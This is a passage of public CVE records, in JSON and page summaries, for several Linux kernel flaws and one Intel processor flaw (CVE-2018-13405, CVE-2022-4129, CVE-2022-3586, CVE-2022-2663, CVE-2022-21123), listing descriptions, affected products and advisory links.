{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T09:00:35.380Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "USN-3752-2", "tags": [ "vendor-advisory", "x_refsource_UBUNTU", "x_transferred" ], "url": "https://usn.ubuntu.com/3752-2/" }, { "name": "RHSA-2018:3083", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2018:3083" }, { "name": "USN-3752-3", "tags": [ "vendor-advisory", "x_refsource_UBUNTU", "x_transferred" ], "url": "https://usn.ubuntu.com/3752-3/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://twitter.com/grsecurity/status/1015082951204327425" }, { "name": "USN-3753-2", "tags": [ "vendor-advisory", "x_refsource_UBUNTU", "x_transferred" ], "url": "https://usn.ubuntu.com/3753-2/" }, { "name": "USN-3754-1", "tags": [ "vendor-advisory", "x_refsource_UBUNTU", "x_transferred" ], "url": "https://usn.ubuntu.com/3754-1/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://openwall.com/lists/oss-security/2018/07/13/2" }, { "name": "RHSA-2018:2948", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2018:2948" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=0fa3ecd87848c9c93c2c828ef4c3a8ca36ce46c7" }, { "name": "[debian-lts-announce] 20180815 [SECURITY] [DLA 1466-1] linux-4.9 security update", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2018/08/msg00014.html" }, { "name": "45033", "tags": [ "exploit", "x_refsource_EXPLOIT-DB", "x_transferred" ], "url": "https://www.exploit-db.com/exploits/45033/" }, { "name": "DSA-4266", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "https://www.debian.org/security/2018/dsa-4266" }, { "name": "106503", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/106503" }, { "name": "USN-3752-1", "tags": [ "vendor-advisory", "x_refsource_UBUNTU", "x_transferred" ], "url": "https://usn.ubuntu.com/3752-1/" }, { "name": "RHSA-2018:3096", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2018:3096" }, { "name": "USN-3753-1", "tags": [ "vendor-advisory", "x_refsource_UBUNTU", "x_transferred" ], "url": "https://usn.ubuntu.com/3753-1/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/0fa3ecd87848c9c93c2c828ef4c3a8ca36ce46c7" }, { "name": "RHSA-2019:0717", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2019:0717" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://support.f5.com/csp/article/K00854051" }, { "name": "RHSA-2019:2476", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2019:2476" }, { "name": "RHSA-2019:2566", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2019:2566" }, { "name": "RHSA-2019:2696", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2019:2696" }, { "name": "RHSA-2019:2730", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2019:2730" }, { "name": "RHSA-2019:4159", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2019:4159" }, { "name": "RHSA-2019:4164", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2019:4164" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/commit/?id=0b3369840cd61c23e2b9241093737b4c395cb406" }, { "name": "FEDORA-2022-3a60c34473", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MTKKIAUMR5FAYLZ7HLEPOXMKAAE3BYBQ/" }, { "name": "FEDORA-2022-5d0676b098", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HRBNBX73SAFKQWBOX76SLMWPTKJPVGEJ/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2018-07-06T00:00:00", "descriptions": [ { "lang": "en", "value": "The inode_init_owner function in fs/inode.c in the Linux kernel through 3.16 allows local users to create files with an unintended group ownership, in a scenario where a directory is SGID to a certain group and is writable by a user who is not a member of that group. Here, the non-member can trigger creation of a plain file whose group ownership is that group. The intended behavior was that the non-member can trigger creation of a directory (but not a plain file) whose group ownership is that group. The non-member can escalate privileges by making the plain file executable and SGID." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-02-25T18:06:30", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "name": "USN-3752-2", "tags": [ "vendor-advisory", "x_refsource_UBUNTU" ], "url": "https://usn.ubuntu.com/3752-2/" }, { "name": "RHSA-2018:3083", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2018:3083" }, { "name": "USN-3752-3", "tags": [ "vendor-advisory", "x_refsource_UBUNTU" ], "url": "https://usn.ubuntu.com/3752-3/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://twitter.com/grsecurity/status/1015082951204327425" }, { "name": "USN-3753-2", "tags": [ "vendor-advisory", "x_refsource_UBUNTU" ], "url": "https://usn.ubuntu.com/3753-2/" }, { "name": "USN-3754-1", "tags": [ "vendor-advisory", "x_refsource_UBUNTU" ], "url": "https://usn.ubuntu.com/3754-1/" }, { "tags": [ "x_refsource_MISC" ], "url": "http://openwall.com/lists/oss-security/2018/07/13/2" }, { "name": "RHSA-2018:2948", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2018:2948" }, { "tags": [ "x_refsource_MISC" ], "url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=0fa3ecd87848c9c93c2c828ef4c3a8ca36ce46c7" }, { "name": "[debian-lts-announce] 20180815 [SECURITY] [DLA 1466-1] linux-4.9 security update", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.debian.org/debian-lts-announce/2018/08/msg00014.html" }, { "name": "45033", "tags": [ "exploit", "x_refsource_EXPLOIT-DB" ], "url": "https://www.exploit-db.com/exploits/45033/" }, { "name": "DSA-4266", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "https://www.debian.org/security/2018/dsa-4266" }, { "name": "106503", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/106503" }, { "name": "USN-3752-1", "tags": [ "vendor-advisory", "x_refsource_UBUNTU" ], "url": "https://usn.ubuntu.com/3752-1/" }, { "name": "RHSA-2018:3096", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2018:3096" }, { "name": "USN-3753-1", "tags": [ "vendor-advisory", "x_refsource_UBUNTU" ], "url": "https://usn.ubuntu.com/3753-1/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/torvalds/linux/commit/0fa3ecd87848c9c93c2c828ef4c3a8ca36ce46c7" }, { "name": "RHSA-2019:0717", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2019:0717" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://support.f5.com/csp/article/K00854051" }, { "name": "RHSA-2019:2476", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2019:2476" }, { "name": "RHSA-2019:2566", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2019:2566" }, { "name": "RHSA-2019:2696", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2019:2696" }, { "name": "RHSA-2019:2730", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2019:2730" }, { "name": "RHSA-2019:4159", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2019:4159" }, { "name": "RHSA-2019:4164", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2019:4164" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/commit/?id=0b3369840cd61c23e2b9241093737b4c395cb406" }, { "name": "FEDORA-2022-3a60c34473", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MTKKIAUMR5FAYLZ7HLEPOXMKAAE3BYBQ/" }, { "name": "FEDORA-2022-5d0676b098", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HRBNBX73SAFKQWBOX76SLMWPTKJPVGEJ/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2018-13405", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "The inode_init_owner function in fs/inode.c in the Linux kernel through 3.16 allows local users to create files with an unintended group ownership, in a scenario where a directory is SGID to a certain group and is writable by a user who is not a member of that group. Here, the non-member can trigger creation of a plain file whose group ownership is that group. The intended behavior was that the non-member can trigger creation of a directory (but not a plain file) whose group ownership is that group. The non-member can escalate privileges by making the plain file executable and SGID." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "USN-3752-2", "refsource": "UBUNTU", "url": "https://usn.ubuntu.com/3752-2/" }, { "name": "RHSA-2018:3083", "refsource": "REDHAT", "url": "https://access.redhat.com/errata/RHSA-2018:3083" }, { "name": "USN-3752-3", "refsource": "UBUNTU", "url": "https://usn.ubuntu.com/3752-3/" }, { "name": "https://twitter.com/grsecurity/status/1015082951204327425", "refsource": "MISC", "url": "https://twitter.com/grsecurity/status/1015082951204327425" }, { "name": "USN-3753-2", "refsource": "UBUNTU", "url": "https://usn.ubuntu.com/3753-2/" }, { "name": "USN-3754-1", "refsource": "UBUNTU", "url": "https://usn.ubuntu.com/3754-1/" }, { "name": "http://openwall.com/lists/oss-security/2018/07/13/2", "refsource": "MISC", "url": "http://openwall.com/lists/oss-security/2018/07/13/2" }, { "name": "RHSA-2018:2948", "refsource": "REDHAT", "url": "https://access.redhat.com/errata/RHSA-2018:2948" }, { "name": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=0fa3ecd87848c9c93c2c828ef4c3a8ca36ce46c7", "refsource": "MISC", "url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=0fa3ecd87848c9c93c2c828ef4c3a8ca36ce46c7" }, { "name": "[debian-lts-announce] 20180815 [SECURITY] [DLA 1466-1] linux-4.9 security update", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2018/08/msg00014.html" }, { "name": "45033", "refsource": "EXPLOIT-DB", "url": "https://www.exploit-db.com/exploits/45033/" }, { "name": "DSA-4266", "refsource": "DEBIAN", "url": "https://www.debian.org/security/2018/dsa-4266" }, { "name": "106503", "refsource": "BID", "url": "http://www.securityfocus.com/bid/106503" }, { "name": "USN-3752-1", "refsource": "UBUNTU", "url": "https://usn.ubuntu.com/3752-1/" }, { "name": "RHSA-2018:3096", "refsource": "REDHAT", "url": "https://access.redhat.com/errata/RHSA-2018:3096" }, { "name": "USN-3753-1", "refsource": "UBUNTU", "url": "https://usn.ubuntu.com/3753-1/" }, { "name": "https://github.com/torvalds/linux/commit/0fa3ecd87848c9c93c2c828ef4c3a8ca36ce46c7", "refsource": "MISC", "url": "https://github.com/torvalds/linux/commit/0fa3ecd87848c9c93c2c828ef4c3a8ca36ce46c7" }, { "name": "RHSA-2019:0717", "refsource": "REDHAT", "url": "https://access.redhat.com/errata/RHSA-2019:0717" }, { "name": "https://support.f5.com/csp/article/K00854051", "refsource": "CONFIRM", "url": "https://support.f5.com/csp/article/K00854051" }, { "name": "RHSA-2019:2476", "refsource": "REDHAT", "url": "https://access.redhat.com/errata/RHSA-2019:2476" }, { "name": "RHSA-2019:2566", "refsource": "REDHAT", "url": "https://access.redhat.com/errata/RHSA-2019:2566" }, { "name": "RHSA-2019:2696", "refsource": "REDHAT", "url": "https://access.redhat.com/errata/RHSA-2019:2696" }, { "name": "RHSA-2019:2730", "refsource": "REDHAT", "url": "https://access.redhat.com/errata/RHSA-2019:2730" }, { "name": "RHSA-2019:4159", "refsource": "REDHAT", "url": "https://access.redhat.com/errata/RHSA-2019:4159" }, { "name": "RHSA-2019:4164", "refsource": "REDHAT", "url": "https://access.redhat.com/errata/RHSA-2019:4164" }, { "name": "https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/commit/?id=0b3369840cd61c23e2b9241093737b4c395cb406", "refsource": "CONFIRM", "url": "https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/commit/?id=0b3369840cd61c23e2b9241093737b4c395cb406" }, { "name": "FEDORA-2022-3a60c34473", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MTKKIAUMR5FAYLZ7HLEPOXMKAAE3BYBQ/" }, { "name": "FEDORA-2022-5d0676b098", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HRBNBX73SAFKQWBOX76SLMWPTKJPVGEJ/" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2018-13405", "datePublished": "2018-07-06T14:00:00", "dateReserved": "2018-07-06T00:00:00", "dateUpdated": "2024-08-05T09:00:35.380Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-4129
Vulnerability from cvelistv5
Published
2022-11-28 00:00
Modified
2024-08-03 01:27
Severity ?
EPSS score ?
Summary
A flaw was found in the Linux kernel's Layer 2 Tunneling Protocol (L2TP). A missing lock when clearing sk_user_data can lead to a race condition and NULL pointer dereference. A local user could use this flaw to potentially crash the system causing a denial of service.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Linux kernel (l2tp) |
Version: up to v6.0 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:27:54.543Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/all/20221114191619.124659-1-jakub%40cloudflare.com/t" }, { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/netdev/20221121085426.21315-1-jakub%40cloudflare.com/t" }, { "name": "FEDORA-2022-e4460c41bc", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AM5KFIE6JNZXHBA5A2KYDZAT3MEX2B67/" }, { "name": "FEDORA-2022-b36cd53dca", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7X5SPXMXXFANDASPCKER2JIQO2F3UHCP/" }, { "name": "FEDORA-2022-24041b1667", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JOKXNIM2R4FQCDRQV67UMAY6EBC72QFG/" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Linux kernel (l2tp)", "vendor": "n/a", "versions": [ { "status": "affected", "version": "up to v6.0" } ] } ], "descriptions": [ { "lang": "en", "value": "A flaw was found in the Linux kernel\u0027s Layer 2 Tunneling Protocol (L2TP). A missing lock when clearing sk_user_data can lead to a race condition and NULL pointer dereference. A local user could use this flaw to potentially crash the system causing a denial of service." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-667", "description": "CWE-667-\u003eCWE-362-\u003eCWE-476", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-05T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://lore.kernel.org/all/20221114191619.124659-1-jakub%40cloudflare.com/t" }, { "url": "https://lore.kernel.org/netdev/20221121085426.21315-1-jakub%40cloudflare.com/t" }, { "name": "FEDORA-2022-e4460c41bc", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AM5KFIE6JNZXHBA5A2KYDZAT3MEX2B67/" }, { "name": "FEDORA-2022-b36cd53dca", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7X5SPXMXXFANDASPCKER2JIQO2F3UHCP/" }, { "name": "FEDORA-2022-24041b1667", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JOKXNIM2R4FQCDRQV67UMAY6EBC72QFG/" }, { "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-4129", "datePublished": "2022-11-28T00:00:00", "dateReserved": "2022-11-23T00:00:00", "dateUpdated": "2024-08-03T01:27:54.543Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3586
Vulnerability from cvelistv5
Published
2022-10-19 00:00
Modified
2024-08-03 01:14
Severity ?
EPSS score ?
Summary
A flaw was found in the Linux kernel’s networking code. A use-after-free was found in the way the sch_sfb enqueue function used the socket buffer (SKB) cb field after the same SKB had been enqueued (and freed) into a child qdisc. This flaw allows a local, unprivileged user to crash the system, causing a denial of service.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Linux Kernel |
Version: Fixed in kernel v6.0 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:14:02.086Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/9efd23297cca" }, { "tags": [ "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/upcoming/" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Linux Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Fixed in kernel v6.0" } ] } ], "descriptions": [ { "lang": "en", "value": "A flaw was found in the Linux kernel\u2019s networking code. A use-after-free was found in the way the sch_sfb enqueue function used the socket buffer (SKB) cb field after the same SKB had been enqueued (and freed) into a child qdisc. This flaw allows a local, unprivileged user to crash the system, causing a denial of service." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-11-01T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://github.com/torvalds/linux/commit/9efd23297cca" }, { "url": "https://www.zerodayinitiative.com/advisories/upcoming/" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-3586", "datePublished": "2022-10-19T00:00:00", "dateReserved": "2022-10-18T00:00:00", "dateUpdated": "2024-08-03T01:14:02.086Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-2663
Vulnerability from cvelistv5
Published
2022-09-01 00:00
Modified
2024-08-03 00:46
Severity ?
EPSS score ?
Summary
An issue was found in the Linux kernel in nf_conntrack_irc where the message handling can be confused and incorrectly matches the message. A firewall may be able to be bypassed when users are using unencrypted IRC with nf_conntrack_irc configured.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Linux kernel |
Version: unknown |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T00:46:04.030Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2022/08/30/1" }, { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/netfilter-devel/20220826045658.100360-1-dgl%40dgl.cx/T/" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" }, { "tags": [ "x_transferred" ], "url": "https://dgl.cx/2022/08/nat-again-irc-cve-2022-2663" }, { "tags": [ "x_transferred" ], "url": "https://www.youtube.com/watch?v=WIq-YgQuYCA" }, { "name": "DSA-5257", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Linux kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "unknown" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was found in the Linux kernel in nf_conntrack_irc where the message handling can be confused and incorrectly matches the message. A firewall may be able to be bypassed when users are using unencrypted IRC with nf_conntrack_irc configured." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-923", "description": "CWE-923", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-11-01T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://www.openwall.com/lists/oss-security/2022/08/30/1" }, { "url": "https://lore.kernel.org/netfilter-devel/20220826045658.100360-1-dgl%40dgl.cx/T/" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" }, { "url": "https://dgl.cx/2022/08/nat-again-irc-cve-2022-2663" }, { "url": "https://www.youtube.com/watch?v=WIq-YgQuYCA" }, { "name": "DSA-5257", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-2663", "datePublished": "2022-09-01T00:00:00", "dateReserved": "2022-08-04T00:00:00", "dateUpdated": "2024-08-03T00:46:04.030Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-21123
Vulnerability from cvelistv5
Published
2022-06-15 19:59
Modified
2024-08-03 02:31
Severity ?
EPSS score ?
Summary
Incomplete cleanup of multi-core shared buffers for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Intel(R) Processors |
Version: See references |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T02:31:59.023Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00615.html" }, { "name": "[oss-security] 20220616 Xen Security Advisory 404 v2 (CVE-2022-21123,CVE-2022-21125,CVE-2022-21166) - x86: MMIO Stale Data vulnerabilities", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/06/16/1" }, { "name": "FEDORA-2022-391e24517d", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FHTEW3RXU2GW6S3RCPQG4VNCZGI3TOSV/" }, { "name": "FEDORA-2022-177a008b98", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T4P2KJYL74KGLHE4JZETVW7PZH6ZIABA/" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20220624-0008/" }, { "name": "FEDORA-2022-925fc688c1", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MCVOMHBQRH4KP7IN6U24CW7F2D2L5KBS/" }, { "name": "[debian-lts-announce] 20220701 [SECURITY] [DLA 3065-1] linux security update", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html" }, { "name": "DSA-5173", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5173" }, { "name": "DSA-5178", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5178" }, { "name": "DSA-5184", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5184" }, { "name": "FEDORA-2022-2c9f8224f8", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RKRXZ4LHGCGMOG24ZCEJNY6R2BTS4S2Q/" }, { "name": "GLSA-202208-23", "tags": [ "vendor-advisory", "x_refsource_GENTOO", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202208-23" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Intel(R) Processors", "vendor": "n/a", "versions": [ { "status": "affected", "version": "See references" } ] } ], "descriptions": [ { "lang": "en", "value": "Incomplete cleanup of multi-core shared buffers for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access." } ], "problemTypes": [ { "descriptions": [ { "description": " information disclosure ", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-08-14T20:10:55", "orgId": "6dda929c-bb53-4a77-a76d-48e79601a1ce", "shortName": "intel" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00615.html" }, { "name": "[oss-security] 20220616 Xen Security Advisory 404 v2 (CVE-2022-21123,CVE-2022-21125,CVE-2022-21166) - x86: MMIO Stale Data vulnerabilities", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "http://www.openwall.com/lists/oss-security/2022/06/16/1" }, { "name": "FEDORA-2022-391e24517d", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FHTEW3RXU2GW6S3RCPQG4VNCZGI3TOSV/" }, { "name": "FEDORA-2022-177a008b98", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T4P2KJYL74KGLHE4JZETVW7PZH6ZIABA/" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://security.netapp.com/advisory/ntap-20220624-0008/" }, { "name": "FEDORA-2022-925fc688c1", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MCVOMHBQRH4KP7IN6U24CW7F2D2L5KBS/" }, { "name": 